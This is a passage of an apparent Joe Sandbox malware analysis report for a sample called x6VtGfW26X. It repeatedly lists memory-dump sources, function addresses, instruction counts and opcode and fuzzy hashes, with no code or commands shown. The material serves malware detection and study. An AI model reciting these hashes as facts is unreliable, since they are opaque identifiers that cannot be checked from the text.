                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5dacf7e2657cc7a3c639557dd92bdbffedde0789fa53f2920463495e397274c9
                                                                                        • Instruction ID: f4a620e34c222648c5a009b350c043cd28cff746bc83b82abdb7236dadc13c1c
                                                                                        • Opcode Fuzzy Hash: 5dacf7e2657cc7a3c639557dd92bdbffedde0789fa53f2920463495e397274c9
                                                                                        • Instruction Fuzzy Hash: 18519CB3E1152547F3680D79CC653A2A6829BD0324F2F423C8E9EAB7C4DD7E5C065284
                                                                                        Function 0084E1C4 Relevance: .2, Instructions: 169COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0ab0d98962125854f98195303e1f9fcb2503a204adc128b48b2afbfc7c218f04
                                                                                        • Instruction ID: 6f5216f99fe749a82a5ef6f1175c4ea21cd406101a134ed9baf7a14371678051
                                                                                        • Opcode Fuzzy Hash: 0ab0d98962125854f98195303e1f9fcb2503a204adc128b48b2afbfc7c218f04
                                                                                        • Instruction Fuzzy Hash: DA5198B3F1162547F3500D28DC983A176439B95324F2F42788E9C6BBC6D97E6C0A5784
                                                                                        Function 008DB39B Relevance: .2, Instructions: 160COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 86247a56028271cf2dca2d7d841673b68e4bb347587df1cf95c66548d7529123
                                                                                        • Instruction ID: 6be345eed04e78ac81f1dc7bea60b0901533f367eae4e864df8df3642d0aac12
                                                                                        • Opcode Fuzzy Hash: 86247a56028271cf2dca2d7d841673b68e4bb347587df1cf95c66548d7529123
                                                                                        • Instruction Fuzzy Hash: 51514EB3E115258BF3544E28CC183A27293EB95311F2F827C8D99AB7C4E93EAD495784
                                                                                        Function 007BD0FF Relevance: .2, Instructions: 154COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e89f837d290fb673608c58a0675fdfd11cc9e5d1dbf06fec60adacf847ec45f5
                                                                                        • Instruction ID: bfb82de1c21a359ad9e86193279a3bf36c6c049c8f2a0d3daad0e207034bb83a
                                                                                        • Opcode Fuzzy Hash: e89f837d290fb673608c58a0675fdfd11cc9e5d1dbf06fec60adacf847ec45f5
                                                                                        • Instruction Fuzzy Hash: 7231EE7024A1049FD7299B28D4E5BBA77E5EFAD700F56582DD0C793621D23AAC03CB87
                                                                                        Function 0081818C Relevance: .2, Instructions: 152COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c9b298f816426b1114a40297c4d42708fe7a3abe5089fe0a198a98a54c3de9fa
                                                                                        • Instruction ID: 015e6b0ed28197313e1232c038ffcd1273b6ac3e00b3483e815222b1fb11d1f4
                                                                                        • Opcode Fuzzy Hash: c9b298f816426b1114a40297c4d42708fe7a3abe5089fe0a198a98a54c3de9fa
                                                                                        • Instruction Fuzzy Hash: DD5171B3F21A258BF3844D68CD883627652DB95311F2B817C8E18AB3D4CD7DAD0D5788
                                                                                        Function 00820235 Relevance: .2, Instructions: 150COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3a8b0999c4fc174f1eb136710247a5d3998569a4d652855eaf56589199eb4e43
                                                                                        • Instruction ID: d4fd84992074f113a9a351fe60089d8abe2ff04cf40e7cb0108db82abe39d0a1
                                                                                        • Opcode Fuzzy Hash: 3a8b0999c4fc174f1eb136710247a5d3998569a4d652855eaf56589199eb4e43
                                                                                        • Instruction Fuzzy Hash: CC516AB3F116298BF3444D68DC983627393DBD5315F2F41388A19AB3C5EA7E9C0A9748
                                                                                        Function 007E7300 Relevance: .2, Instructions: 150COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 29e1d9d8c990e003f682d5498ad596521d9c92af37959f60a2f05e51fdb3f7cc
                                                                                        • Instruction ID: b4fb4a9bb02463381bf8e401e62be92e08b9b4eb573068ca8add33d5761179a5
                                                                                        • Opcode Fuzzy Hash: 29e1d9d8c990e003f682d5498ad596521d9c92af37959f60a2f05e51fdb3f7cc
                                                                                        • Instruction Fuzzy Hash: E2515D72E096958BD70CCE69CC913AE7BE2AB89314F19C16DD451EB392D63C8941CB81
                                                                                        Function 007E6554 Relevance: .1, Instructions: 148COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: eaca234ddb79d7eea00358f1c899a0344acf35aeef016559fc8cddc0c3432e83
                                                                                        • Instruction ID: 76f678950b713795357c6b91251a5b1a077febbf7eb3a3ff16f2d4cd7a745ead
                                                                                        • Opcode Fuzzy Hash: eaca234ddb79d7eea00358f1c899a0344acf35aeef016559fc8cddc0c3432e83
                                                                                        • Instruction Fuzzy Hash: DA513772E052558FDB04CF79CD9139EBBE2AB99314F1E816CC451AB386DA7C89428B41
                                                                                        Function 00C591A7 Relevance: .1, Instructions: 140COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2a87c527f2e667eaa80b871b4d6359405db151b9a973aef3e6575a4e246f840d
                                                                                        • Instruction ID: be67f1dfeaa2edaf05e1041a18e073a6e8136a40e0ddf645995c1c3af004d829
                                                                                        • Opcode Fuzzy Hash: 2a87c527f2e667eaa80b871b4d6359405db151b9a973aef3e6575a4e246f840d
                                                                                        • Instruction Fuzzy Hash: 2D41A1F2508600AFE715BE18EC85BAAB7E5EF58310F06893CDAC583754E635A840CB87
                                                                                        Function 008AA221 Relevance: .1, Instructions: 126COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e6775210a36a960260667437e470841d3bee32445d1cc44aeb6071ac53e82518
                                                                                        • Instruction ID: c3470fb2f75fa5b7bfb5a34a98f8d6069dd08dbd998cb5fde786395055a91d83
                                                                                        • Opcode Fuzzy Hash: e6775210a36a960260667437e470841d3bee32445d1cc44aeb6071ac53e82518
                                                                                        • Instruction Fuzzy Hash: 97419173F116298BF3984D68CC583A2B252DBD5301F2F81788E19AB7C5DD3EAD096784
                                                                                        Function 00848047 Relevance: .1, Instructions: 123COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2df1eac3d9a4dcb5a03f34f0f0c70ef44aa84eda09fbf5657b2b6ed57c97d914
                                                                                        • Instruction ID: 4070589600473b7299eabb5e949a867da67218a2535d265ef8ae3a976140b553
                                                                                        • Opcode Fuzzy Hash: 2df1eac3d9a4dcb5a03f34f0f0c70ef44aa84eda09fbf5657b2b6ed57c97d914
                                                                                        • Instruction Fuzzy Hash: C84177B3F015258BF3148969CC943A262839BE5325F2F82788E5CBB3C5E97E5C4A53C0
                                                                                        Function 0082558E Relevance: .1, Instructions: 121COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825261439.0000000000AB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825364575.0000000000C59000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825381256.0000000000C5A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7b0000_x6VtGfW26X.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 13110099d420b27fdc4596408c963ef55f4c44779c0e6fc1536dd133228e05d4
                                                                                        • Instruction ID: 6b6594022c54d3e55fc50871a356b5b8d71d42d230f5ac3de8fc1ffd13fc3ed6
                                                                                        • Opcode Fuzzy Hash: 13110099d420b27fdc4596408c963ef55f4c44779c0e6fc1536dd133228e05d4
                                                                                        • Instruction Fuzzy Hash: C5416DB7F5166547F390483ADC983A22683DBD6325F3F82748E186B7C5DCBE580A5244
                                                                                        Function 0085C31A Relevance: .1, Instructions: 103COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1825017053.0000000000805000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1824936328.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1824952724.00000000007F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825000843.0000000000803000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1825017053.0000000000AB7000.00000040.00000001.01000000.00000003.sdmpDownload File
